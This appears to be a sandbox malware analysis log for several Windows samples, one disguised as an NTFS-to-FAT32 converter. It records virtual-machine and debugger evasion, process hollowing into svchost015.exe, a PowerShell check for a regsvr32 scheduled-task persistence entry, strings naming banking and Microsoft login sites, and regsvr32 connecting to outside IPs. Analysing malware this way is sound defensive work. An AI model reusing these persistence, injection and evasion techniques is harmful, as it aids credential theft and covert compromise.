                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_00464048
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_004644C4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,4_2_00462ABC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,4_2_00497A74
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe Code function: 3_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,3_2_00409B30
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe Thread delayed: delay time: 60000
                    Source: C:\Windows\SysWOW64\regsvr32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmp Binary or memory string: ParallelsVirtualMachine
                    Source: nK8noQeiXl.exe, 00000000.00000003.1361521183.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: Qv4wdsLMG.tmp, 00000007.00000002.1624878101.0000000000599000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                    Source: ntfs2fat32converter102.exe, 00000005.00000002.2572237278.0000000000998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@]5
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_y
                    Source: nK8noQeiXl.exe, 00000000.00000000.1318171414.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: QEMUU
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.000000000397E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: svchost015.exe, 00000001.00000002.1819615613.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000001.00000002.1819615613.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2574985165.0000000003350000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206752083.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1981157929.00000000009CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2179860571.0000000000999000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: Qv4wdsLMG.tmp, 00000007.00000002.1624878101.0000000000599000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: regsvr32.exe, 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
                    Source: DrjfIAN86u.tmp, 00000004.00000002.2574726751.0000000005CEA000.00000004.00001000.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000000.1568837981.00000000005BF000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: QEMU Copy On Write archive
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxs
l:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
                    Source: powershell.exe, 00000013.00000002.2127597678.000000000521E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008669948.0000000003978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe API call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe API call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\regsvr32.exe API call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep	graph_5-61490
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 1_2_100057B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_100057B0
Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe	Code function: 5_2_02D9E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,	5_2_02D9E6BE
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp	Code function: 4_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,	4_2_004502AC
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 1_2_100097BA GetProcessHeap,	1_2_100097BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 1_2_10002AF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_10002AF3
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 1_2_100057B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_100057B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 1_2_10002FEE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_10002FEE
Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe	Code function: 5_2_02D980E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_02D980E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_02779A6B SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlen,ExitProcess,GetTempPathA,lstrcpy,lstrcat,lstrcat,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpy,lstrlen,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,lstrcat,lstrcat,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlen,StartServiceCtrlDispatcherA,GetLastError,Sleep,CreateThread,WSAStartup,CreateThread,Sleep,	10_2_02779A6B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 194.87.98.18 443
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 67.195.204.77 25
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 52.101.41.22 25
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41C000
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 429000
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp	Code function: 4_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,	4_2_00478420
Source: C:\Users\user\Desktop\nK8noQeiXl.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe "C:\Users\user\Desktop\nK8noQeiXl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp	Process created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_02777809 GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,	10_2_02777809
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp	Code function: 4_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,	4_2_0042E0AC
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 1_2_100031B8 cpuid	1_2_100031B8
Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe	Code function: GetLocaleInfoA,	3_2_004051FC
Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe	Code function: GetLocaleInfoA,	3_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp	Code function: GetLocaleInfoA,	4_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp	Code function: GetLocaleInfoA,	4_2_004085BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
